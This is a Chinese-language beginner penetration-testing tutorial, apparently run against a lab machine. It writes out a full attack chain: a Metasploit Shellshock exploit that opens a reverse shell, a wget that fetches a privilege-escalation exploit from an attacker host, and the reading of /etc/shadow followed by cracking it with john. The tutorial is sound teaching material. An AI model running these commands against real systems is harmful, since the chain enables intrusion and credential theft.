相关阅读

【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-自由者联盟
【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-自由者联盟

视频讲解

图文讲解

初学者可以参考的渗透测试三大步骤

  • 扫描设备/服务
  • 寻找脆弱性/漏洞
  • 进行POST请求测试/使用EXP进行漏洞利用
图片[1]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

那么扫描设备/服务,这里主要使用到的就是Nmap,我们之前在信息主动收集里有详细讲解过

【零基础学渗透】主动信息收集-自由者联盟

视频中使用的命令主要是扫描设备的服务-sV和操作系统的版本号-O,要扫码全端口使用-p指定端口范围

sudo nmap 192.168.0.114 -sV -O -p1-65535
图片[2]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

然后静等一会儿就可以看到扫描结果了

图片[3]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

然后,我们就可以尝试寻找漏洞了,今天我们主要利用的Apache的漏洞,做完了端口和服务的扫描,我们可以进行目录扫描,接下来使用的是dirb工具

dirb http://192.168.0.114

然后我们发现了cgi-bin这个路径,我们尝试进行漏洞的挖掘

图片[4]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog
图片[5]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

我们这里使用metasploit渗透测试框架,输入

sudo msfconsole

然后寻找对应的模块

search shellshock
图片[6]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

我们这里要使用的是第一个

use 1
图片[7]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

然后设置好相关的选项RHOSTSRPATHTARGETURI

set RHOSTS 192.168.0.114
set RPATH /bin
set TARGETURI /cgi-bin/hello_world.sh
图片[8]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

然后进行执行

exploit
图片[9]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

我们发现出现session会话的出现,代表反弹shell已经连接成功

图片[10]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

那现在相当于我们已经托管了这台服务器的终端,我们可以输入命令,譬如sysinfo来查看系统信息、whoami来查看用户身份

图片[11]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

这里我们发现我们没有获得root权限,因此无法查看存储的密码情况,这时我们需要研究如何提升权限,我们可以通过wget或者curl命令下载恶意脚本来完成权限提升,这里使用的是下面命令来下载37292.c恶意提权的c语言文件(该文件代码可以在这里查看,参考https://github.com/offensive-security/exploitdb/blob/master/exploits/linux/local/37292.c

wget http://192.168.0.192/37292.c
图片[12]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

然后使用gcc进行编译,生成ofs文件

gcc 37292.c -o ofs

然后给予可以执行权限,并运行

chmod +x ofs
./ofs
图片[13]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

这时我们继续输入whoami,可以看到奇迹发生了,我们已经成为root管理员了

图片[14]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

然后,我们只需要输入

cat /etc/passwd
cat /etc/shadow

就可以查看加密的密码了,我们可以将其复制保存到passwdshadow文件中(文件名字你也可以叫别的),然后就可以进行离线破解了,我们之前提到的hashcat可以破解,这里使用的是john,我们也讲解一下

这里需要先将我们之前存储的passwdshadow文件合并在一起,生成unshadowed.txt

unshadow passwd shadow > unshadowed.txt 

使用我们的字典对其进行破解,还原其中的用户名和密码

john --wordlist=/usr/share/wordlist/rockyou.txt unshadowed.txt

输入下面命令可以查看结果

john --show unshadowed.txt
图片[15]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

这里我们发现获得了用户名和密码均为vagrant的用户,这时,我们可以尝试通过ssh看看能不能访问到服务器!

总结一下,如果我们入侵成功了。

需要寻找是否存在FTP、SSH、web页面可供我们连接。

同时,我们还需要尝试看看能不能提权拿到root管理员权限

图片[16]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容